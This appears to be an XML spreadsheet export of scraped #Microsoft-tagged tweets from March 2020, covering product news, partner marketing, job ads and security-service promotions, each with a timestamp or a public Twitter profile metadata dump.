    <t>Have you heard? #Microsoft is offering a free 6-month @Office365 E1 Trial in response to the need for employees to #WFH due to #coronavirus. As a @msPartner we can help you get going quickly. Learn more &amp;amp; #EngageWithAbel today: https://t.co/GZF9wHzg7Y
#COVID19 #mspartner https://t.co/svQ1XCzFFP</t>
  </si>
  <si>
    <t>{'id': 811680029834956806, 'id_str': '811680029834956806', 'name': 'Abel Solutions', 'screen_name': 'AbelSolutions', 'location': 'Atlanta, GA', 'description': 'Partnering to increase profitability, productivity, and competitive leadership.', 'url': 'https://t.co/kGn7QL3y4q', 'entities': {'url': {'urls': [{'url': 'https://t.co/kGn7QL3y4q', 'expanded_url': 'http://www.abelsolutions.com/', 'display_url': 'abelsolutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 349, 'listed_count': 4, 'created_at': 'Wed Dec 21 21:09:34 +0000 2016', 'favourites_count': 1101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 869, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092433611721183234/EIDU5R4R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092433611721183234/EIDU5R4R_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811680029834956806/1578424460',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</si>
  <si>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14:23:04 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft teases new @Windows 10 Start menu that de-emphasizes Live Tiles
https://t.co/ilwaQiv4gj
#Windows #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1210168596074291200, 'id_str': '1210168596074291200', 'name': 'Vereigen Media', 'screen_name': 'VereigenMedia', 'location': 'London,UK', 'description': 'Vereigen Media Helps Businesses Find New Customers. At Vereigen, We Understand That Accurate Data Is A Key Component Of Your Businessâ€™s Growth. #emailmarketing', 'url': 'https://t.co/fq2VYHkJHK', 'entities': {'url': {'urls': [{'url': 'https://t.co/fq2VYHkJHK', 'expanded_url': 'http://www.vereigenmedia.com/', 'display_url': 'vereigenmedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 243, 'friends_count': 844, 'listed_count': 3, 'created_at': 'Thu Dec 26 12:01:36 +0000 2019', 'favourites_count': 2237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 166, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1215281626932031488/EPldjz41_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215281626932031488/EPldjz41_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1210168596074291200/1579517551',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</si>
  <si>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14:20:48 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft reveals Windows 10's redesigned Start menu https://t.co/l3XhC2j3QE</t>
  </si>
  <si>
    <t>Wed Mar 04 14:20:03 +0000 2020</t>
  </si>
  <si>
    <t>Or do you want to know more about how you could better protect your business?
Read more  https://t.co/aheQAa4JTC
#Phishing #Microsoft #SecurityHacker https://t.co/thk0XbdCHW</t>
  </si>
  <si>
    <t>Wed Mar 04 14:16:51 +0000 2020</t>
  </si>
  <si>
    <t>The latest The Microsoft R Server Daily! https://t.co/UnNEBRPcY9 Thanks to @OznetSupport #cloud #microsoft</t>
  </si>
  <si>
    <t>{'id': 23242773, 'id_str': '23242773', 'name': 'Jen Stirrup #MakeYourDataWork', 'screen_name': 'jenstirrup', 'location': 'London, England', 'description': '#AI #Analytics #BusinessIntelligence influencer. #MVPBuzz, Microsoft Regional Director, Keynote Speaker, \n#DataScience #BeKind https://t.co/NVoLRnGPlF https://t.co/W653ZVQXTu', 'url': 'https://t.co/JlkRBFxh8y', 'entities': {'url': {'urls': [{'url': 'https://t.co/JlkRBFxh8y', 'expanded_url': 'http://www.jenstirrup.com', 'display_url': 'jenstirrup.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/NVoLRnGPlF', 'expanded_url': 'http://data-relish.com', 'display_url': 'data-relish.com', 'indices': [127, 150]}, {'url': 'https://t.co/W653ZVQXTu', 'expanded_url': 'http://jenstirrup.com', 'display_url': 'jenstirrup.com', 'indices': [151, 174]}]}}, 'protected': False, 'followers_count': 18258, 'friends_count': 11729, 'listed_count': 1611, 'created_at': 'Sat Mar 07 22:27:44 +0000 2009', 'favourites_count': 3362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 93465, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '214542', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1026233960660197376/5Kz5qytZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026233960660197376/5Kz5qytZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23242773/1578652917', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '3B615D', 'profile_text_color': 'B4D9AD', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:16:15 +0000 2020</t>
  </si>
  <si>
    <t>Amazon and Microsofts cloud-computing businesses poised to weather a recession, despite coronavirus, analysts say https://t.co/aIoR6vGzic #CloudWars #CloudComputing #Cloud #AWS #Microsoft</t>
  </si>
  <si>
    <t>{'id': 250912412, 'id_str': '250912412', 'name': 'Cloud Wars by @TheCloudNetwork â˜ï¸', 'screen_name': 'CloudWars', 'location': '', 'description': 'Cloud Computing Wars is curated by @OpineMediaGroup', 'url': 'https://t.co/8KLtw8dINU', 'entities': {'url': {'urls': [{'url': 'https://t.co/8KLtw8dINU', 'expanded_url': 'http://www.opinemediagroup.com', 'display_url': 'opinemediagroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 256, 'listed_count': 1, 'created_at': 'Sat Feb 12 02:07:41 +0000 2011', 'favourites_count': 73, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 503,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'http://pbs.twimg.com/profile_images/1496444589/cloudwars_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1496444589/cloudwars_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/250912412/1573918327',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</si>
  <si>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14:14:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers #5G Network Edge Compute Technology
 #iot #Microsoft #Azure
https://t.co/miQcIAjOep</t>
  </si>
  <si>
    <t>Wed Mar 04 14:12:40 +0000 2020</t>
  </si>
  <si>
    <t>Minutes away from PowerObjects' Presentation at @housingtech! Featuring Jamie Barker (@jab365) and Steve Lyon - don't miss the innovations that Microsoft's Power Platform offers you!
#ukhousing #HousingTech2020 #PowerPlatform #Microsoft #PowerApps #socialhousing https://t.co/G0oLvKKr1K</t>
  </si>
  <si>
    <t>{'id': 19601625, 'id_str': '19601625', 'name': 'PowerObjects', 'screen_name': 'powerobjects', 'location': 'Deep in your D365 system', 'description': 'PowerObjects is working to stay the #1 #MSDyn365 partner in the world...and having a blast! \n#PowerPlatform #D365', 'url': 'http://t.co/4CRpLb3JVo', 'entities': {'url': {'urls': [{'url': 'http://t.co/4CRpLb3JVo', 'expanded_url': 'http://www.powerobjects.com', 'display_url': 'powerobjects.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4720, 'friends_count': 321, 'listed_count': 287, 'created_at': 'Tue Jan 27 17:00:43 +0000 2009', 'favourites_count': 881, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11981, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0084B4', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151927207562010624/nmFtoQXX_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151927207562010624/nmFtoQXX_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19601625/1505921610', 'profile_link_color': '1B95E0',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</si>
  <si>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Wed Mar 04 14:12:08 +0000 2020</t>
  </si>
  <si>
    <t>The global average cost of a #cyberattack is $3.6 million. Yikes! But don't worry, we can help protect your business. Check out this e-book from #Microsoft to identify the three most common threats: viruses, phishing, and ransomware. https://t.co/LQ5PH55p6M</t>
  </si>
  <si>
    <t>Wed Mar 04 14:11:19 +0000 2020</t>
  </si>
  <si>
    <t>Our own Matt Mowrey shares lessons on using #PowerPlatform #Microsoft to underpin the systems we use to Shape a More Livable World! https://t.co/kkPEkTZLKD @GoCollectiv</t>
  </si>
  <si>
    <t>{'id': 183244245, 'id_str': '183244245', 'name': 'DAI', 'screen_name': 'DAIGlobal', 'location': 'Over 100 countries worldwide', 'description': 'Global development professionals. Dedicated to shaping a more livable world. Learning how every day. #globaldev', 'url': 'https://t.co/j1XkZ4UpaF', 'entities': {'url': {'urls': [{'url': 'https://t.co/j1XkZ4UpaF', 'expanded_url': 'http://www.dai.com', 'display_url': 'dai.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21865, 'friends_count': 2737, 'listed_count': 529, 'created_at': 'Thu Aug 26 14:41:19 +0000 2010', 'favourites_count': 7200, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24384, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1141636996571574273/TgivYMpW_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141636996571574273/TgivYMpW_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/183244245/1578316936', 'profile_link_color': '6C4713', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'E6E5E2', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:11:13 +0000 2020</t>
  </si>
  <si>
    <t>Software Tip: #Microsoft #Office shortcut to format selected text/cells/object as italics/not italics=CTRL+I</t>
  </si>
  <si>
    <t>Wed Mar 04 14:10:56 +0000 2020</t>
  </si>
  <si>
    <t>Marilyn Radebe CEO and Founder of Precisional Growth kicked off the first leg of the #LimpopoDigitalSummit #Connecttheword #Microsoft #4IR #MeropaSunInn https://t.co/8oIbFbwjLL</t>
  </si>
  <si>
    <t>Wed Mar 04 14:10:18 +0000 2020</t>
  </si>
  <si>
    <t>Are you a #military spouse located in #ElPaso / #Fortbliss area? Interested in learning to code? #Microsoft #techtonic and #Workforceborderplex will PAY you to become a software developer! Apply today! https://t.co/nrknRe6gOo https://t.co/IsbM7ooYc1</t>
  </si>
  <si>
    <t>{'id': 11920512, 'id_str': '11920512', 'name': 'Techtonic', 'screen_name': 'TechtonicGroup', 'location': 'Boulder, CO', 'description': 'Techtonic is the premier partner for enterprise-level software development, accelerated delivery and scalable onshore talent.', 'url': 'https://t.co/EtlufmXLdV', 'entities': {'url': {'urls': [{'url': 'https://t.co/EtlufmXLdV', 'expanded_url': 'http://WWW.TECHTONIC.COM', 'display_url': 'TECHTONIC.COM', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 665, 'friends_count': 2258, 'listed_count': 16, 'created_at': 'Sun Jan 06 22:52:39 +0000 2008', 'favourites_count': 738, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1868, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ABB8C2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103344832938860545/StiVazcg_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103344832938860545/StiVazcg_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/11920512/1572361548', 'profile_link_color': '4A913C',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</si>
  <si>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14:10:07 +0000 2020</t>
  </si>
  <si>
    <t>Take a headstart by embracing the latest browser changes
#FNC  #vcl #UPDATE #Microsoft #edge #Windows #iOS #Android 
https://t.co/9sgCccxYa9 https://t.co/IJpwwvqp4F</t>
  </si>
  <si>
    <t>{'id': 69586848, 'id_str': '69586848', 'name': 'tmssoftware', 'screen_name': 'TMSsoftwareNews', 'location': 'Belgium', 'description': 'Feature-packed &amp; high performance VCL, FMX, .NET, LCL, FNC, Cloud components &amp; developer tools for Delphi, C++Builder, Visual Studio, Lazarus', 'url': 'https://t.co/XWveGwlylq', 'entities': {'url': {'urls': [{'url': 'https://t.co/XWveGwlylq', 'expanded_url': 'http://www.tmssoftware.com', 'display_url': 'tmssoftware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1851, 'friends_count': 128, 'listed_count': 49, 'created_at': 'Fri Aug 28 13:26:28 +0000 2009', 'favourites_count': 209, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2309,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'http://pbs.twimg.com/profile_images/734716589237538818/HzFZzjB-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/734716589237538818/HzFZzjB-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/69586848/1574775943',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</si>
  <si>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14:09:12 +0000 2020</t>
  </si>
  <si>
    <t>Vendors such as #Microsoft #Google, #Cisco &amp;amp; #Zoom etc have announced that, they are going to make their #collaboration apps or a higher tier on their #conferencing solutions available for use. This is in response to rise in remote work &amp;amp; learning, in light of #covid19 (1/4)</t>
  </si>
  <si>
    <t>{'id': 539093136, 'id_str': '539093136', 'name': 'Megha Kumar', 'screen_name': 'MeghaK_IDC', 'location': 'Toronto, Ontario', 'description': 'Head #SW &amp; #Cloud @IDCCanada ðŸ‡¨ðŸ‡¦.  Previously #MEA ðŸ‡¦ðŸ‡ª Thought leader on #Cloud #DigitalTransformation &amp; #Innovation Love #Coffee #Travel. Tweets are my own', 'url': 'https://t.co/GnliGIAM1u', 'entities': {'url': {'urls': [{'url': 'https://t.co/GnliGIAM1u', 'expanded_url': 'http://linkedin.com/in/meghamk', 'display_url': 'linkedin.com/in/meghamk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1237, 'friends_count': 332, 'listed_count': 248, 'created_at': 'Wed Mar 28 12:42:24 +0000 2012', 'favourites_count': 5131, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9349,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'http://pbs.twimg.com/profile_images/705979812813381632/5jagjYbJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/705979812813381632/5jagjYbJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/539093136/1434518744',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</si>
  <si>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14:09:10 +0000 2020</t>
  </si>
  <si>
    <t>Powerpoint 2016 2019 - Master powerpoint presentation..94% off #udemy_coupon_code #Best_courses, #Microsoft, #office_productivity, #powerpoint https://t.co/d6MzEyhPN5 https://t.co/JaDxtadOak</t>
  </si>
  <si>
    <t>{'id': 3082124964, 'id_str': '3082124964', 'name': 'rosa ( learning online course)', 'screen_name': 'tota_meso', 'location': '', 'description': 'I am interesting to share an online courses with free coupon or with huge discount  follow my site to see special coupons\n#developers,#design #marketing', 'url': 'https://t.co/rSmOxy7L9o', 'entities': {'url': {'urls': [{'url': 'https://t.co/rSmOxy7L9o', 'expanded_url': 'http://www.learningonlinecourse.com/', 'display_url': 'learningonlinecourse.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1560, 'friends_count': 1520, 'listed_count': 31, 'created_at': 'Sat Mar 14 20:00:44 +0000 2015', 'favourites_count': 237, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8111,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'http://pbs.twimg.com/profile_images/847807408491704324/e6V6Fky4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/847807408491704324/e6V6Fky4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3082124964/1490968564',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</si>
  <si>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14:08:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft's cloud-based printing service is now in private preview https://t.co/08peOGVjLS by @ZDNet #Cloud #Tech #Microsoft #Printing</t>
  </si>
  <si>
    <t>{'id': 1970550942, 'id_str': '1970550942', 'name': 'MyCloudIT', 'screen_name': 'MyCloudIT_DaaS', 'location': 'Texas, USA', 'description': 'Reclaim Control of the #Cloud in #Microsoft #Azure with a Turnkey Automation and Management Solution', 'url': 'https://t.co/rrimOCecCL', 'entities': {'url': {'urls': [{'url': 'https://t.co/rrimOCecCL', 'expanded_url': 'http://www.mycloudit.com', 'display_url': 'mycloudit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4142, 'friends_count': 2315, 'listed_count': 86, 'created_at': 'Sat Oct 19 06:24:24 +0000 2013', 'favourites_count': 750, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5831,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'http://pbs.twimg.com/profile_images/1148292655882874880/0Zg444s6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148292655882874880/0Zg444s6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1970550942/1564435209',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</si>
  <si>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14:08:19 +0000 2020</t>
  </si>
  <si>
    <t>Take advantage of #Microsoft #Surface Devices, the best way to experience #Windows10, in a flexible way that is convenient for your organisation with Surface-as-a-Service. Find out more https://t.co/rllluijSfy</t>
  </si>
  <si>
    <t>Wed Mar 04 14:08:02 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco, #Microsoft Team to Control Growing #IoT networks https://t.co/mK5vj2y4i5 https://t.co/wDBnDLpjMv</t>
  </si>
  <si>
    <t>{'id': 4570872556, 'id_str': '4570872556', 'name': 'Onepath', 'screen_name': 'cabletocloud', 'location': 'Atlanta, GA', 'description': 'Onepath is the single source for designing, deploying, and supporting all aspects of technologyâ€”from cable to cloud.', 'url': 'https://t.co/4s9KEkU2zg', 'entities': {'url': {'urls': [{'url': 'https://t.co/4s9KEkU2zg', 'expanded_url': 'http://www.1path.com', 'display_url': '1path.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 193, 'friends_count': 187, 'listed_count': 3, 'created_at': 'Tue Dec 22 19:30:24 +0000 2015', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2353,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'http://pbs.twimg.com/profile_images/750332453362032640/xJ4HAYn6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/750332453362032640/xJ4HAYn6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4570872556/1519393116',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</si>
  <si>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14:08:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft strikes a new #deal with #NFL to have all 32 teams use #MicrosoftTeams https://t.co/EFJ2MFmaCH #ITNews</t>
  </si>
  <si>
    <t>{'id': 3039883214, 'id_str': '3039883214', 'name': 'Manoj Kumar', 'screen_name': 'manoj_thakur91', 'location': 'Mohali, India', 'description': 'WordPress Developer and SEO Manager @SankalpITteam. Expertise in IT Marketing, #Influencer, Website Support, Maintenance and Develpment Service Provider.', 'url': 'https://t.co/gBC4rQxGNm', 'entities': {'url': {'urls': [{'url': 'https://t.co/gBC4rQxGNm', 'expanded_url': 'https://sankalpit.com/', 'display_url': 'sankalpit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2513, 'friends_count': 4243, 'listed_count': 33, 'created_at': 'Tue Feb 24 16:02:19 +0000 2015', 'favourites_count': 6734, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12968,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'http://pbs.twimg.com/profile_images/1232178543578112000/h5QeZEzZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232178543578112000/h5QeZEzZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3039883214/1582609349',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</si>
  <si>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14:07:36 +0000 2020</t>
  </si>
  <si>
    <t>IT @jobvectorDE career day in Munich at the @MVG_AHK museum today - we have a lot to offer...
#career #cloud #Microsoft #citrix https://t.co/hWVAACoAY1</t>
  </si>
  <si>
    <t>{'id': 1097772834594664448, 'id_str': '1097772834594664448', 'name': 'Inken EiteljÃ¶rge', 'screen_name': 'InkenEit', 'location': 'KÃ¶ln', 'description': 'Always looking on the psychological side of things. Feeling home in HR, IT and Engineering.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 88, 'listed_count': 0, 'created_at': 'Tue Feb 19 08:20:14 +0000 2019', 'favourites_count': 179,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'http://pbs.twimg.com/profile_images/1196811157136461824/f7wj4Awc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196811157136461824/f7wj4Awc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1097772834594664448/1574177368',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</si>
  <si>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14:06:38 +0000 2020</t>
  </si>
  <si>
    <t>Global manufacturer, Coats, moved over 180 servers and its entire SAP estate to #Microsoft #Azure, reducing run costs by 25-30%. Contact Qaixen to find out what Azure can do for you. https://t.co/Ie4GEZlDZo</t>
  </si>
  <si>
    <t>Wed Mar 04 14:06:12 +0000 2020</t>
  </si>
  <si>
    <t>Investing in a cybersecurity program is no longer optional, no matter the size of your business. Check out this infographic to learn more about how you can protect your business with our #Microsoft #security solutions. https://t.co/0RdBbziKJu</t>
  </si>
  <si>
    <t>{'id': 1339964700, 'id_str': '1339964700', 'name': 'Robert Wilske', 'screen_name': 'WilskeRobert', 'location': 'Tampa, FL', 'description': '', 'url': 'http://t.co/28pHveg0AF', 'entities': {'url': {'urls': [{'url': 'http://t.co/28pHveg0AF', 'expanded_url': 'http://www.redcelltechnologies.com', 'display_url': 'redcelltechnologies.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 75, 'listed_count': 4, 'created_at': 'Tue Apr 09 19:17:41 +0000 2013', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 496, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '303336', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/843891155674824705/Yt2WFAFn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/843891155674824705/Yt2WFAFn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1339964700/1556727291', 'profile_link_color': 'ED1C24', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'BDB2AF', 'profile_text_color': 'DE4B4B', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:06:11 +0000 2020</t>
  </si>
  <si>
    <t>When was the last time disaster struck your IT infrastructure? If it hasn't happened yet, you're lucky. Safeguard against future mishaps and disaster with a comprehensive set of #Microsoft solutions tailored to secure your data. https://t.co/EeXZ8cGBpt</t>
  </si>
  <si>
    <t>{'id': 2816301842, 'id_str': '2816301842', 'name': 'FH-Networking, LLC', 'screen_name': 'fh_networking', 'location': 'Allen, Texas', 'description': 'Technology Management and Consulting Services for Small to Medium Businesses and Residential Customers. We keep your technology running smoothly!', 'url': 'http://t.co/s2sr9i0ttR', 'entities': {'url': {'urls': [{'url': 'http://t.co/s2sr9i0ttR', 'expanded_url': 'http://www.fhnetworking.com', 'display_url': 'fhnetworking.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 429, 'friends_count': 728, 'listed_count': 18, 'created_at': 'Thu Sep 18 04:05:52 +0000 2014', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1815,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'http://pbs.twimg.com/profile_images/512454748356612096/xjnmmWZN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/512454748356612096/xjnmmWZN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2816301842/1411013753',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</si>
  <si>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14:06:06 +0000 2020</t>
  </si>
  <si>
    <t>Didn't make it to ISE - join us for an update event - Microsoft Teams &amp;amp; Your Meeting Rooms on 2nd April, 11am in London. #remoteworking #Microsoft #collaboration
 https://t.co/KdEXCU6srY</t>
  </si>
  <si>
    <t>{'id': 39958549, 'id_str': '39958549', 'name': 'AuDeo Systems', 'screen_name': 'audeoVC', 'location': 'Basingstoke, UK', 'description': 'AuDeo is a Visual Communications Specialist.', 'url': 'http://t.co/fVOHiFJscz', 'entities': {'url': {'urls': [{'url': 'http://t.co/fVOHiFJscz', 'expanded_url': 'http://www.audeo.co.uk', 'display_url': 'audeo.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 124, 'friends_count': 88, 'listed_count': 13, 'created_at': 'Thu May 14 08:58:51 +0000 2009', 'favourites_count': 87, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 504,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'http://pbs.twimg.com/profile_images/912985886756917249/gKeU0Mgi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/912985886756917249/gKeU0Mgi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39958549/1506508166', 'profile_link_color': '3B94D9',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</si>
  <si>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14:06:02 +0000 2020</t>
  </si>
  <si>
    <t>Discover Microsoft's 3-step approach to GDPR. With #Microsoft 365, PHI Technologies Corp helps customers achieve compliance and stay secure. https://t.co/VWtza4JbdU</t>
  </si>
  <si>
    <t>{'id': 1058801623378653186, 'id_str': '1058801623378653186', 'name': 'PHI: Powering Human Intelligence', 'screen_name': 'CorpPhi', 'location': 'Fort Lauderdale, FL', 'description': 'PHI Technologies is a data management and analytics company with specialties in cloud, AI, and applications development.', 'url': 'https://t.co/uNo88bEE9P', 'entities': {'url': {'urls': [{'url': 'https://t.co/uNo88bEE9P', 'expanded_url': 'http://www.phitechnologies.com', 'display_url': 'phitechnologies.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 445, 'friends_count': 1437, 'listed_count': 2, 'created_at': 'Sat Nov 03 19:22:33 +0000 2018', 'favourites_count': 263, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 750,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'http://pbs.twimg.com/profile_images/1058810437041639427/BEYRowaS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1058810437041639427/BEYRowaS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1058801623378653186/1547561020',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</si>
  <si>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14:04:44 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Star2Star offers a Citrix Ready UCaaS solution: " https://t.co/AZnb9vEG1T
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Wed Mar 04 14:02:30 +0000 2020</t>
  </si>
  <si>
    <t>Announcing the new native Outreach + @MSFTDynamics365 integration with bi-directional sync between both systems! Check it out on the blog &amp;gt;&amp;gt; https://t.co/8270v3YkHJ #OutreachGalaxy #Microsoft #salesengagement https://t.co/WvDXKOWCdW</t>
  </si>
  <si>
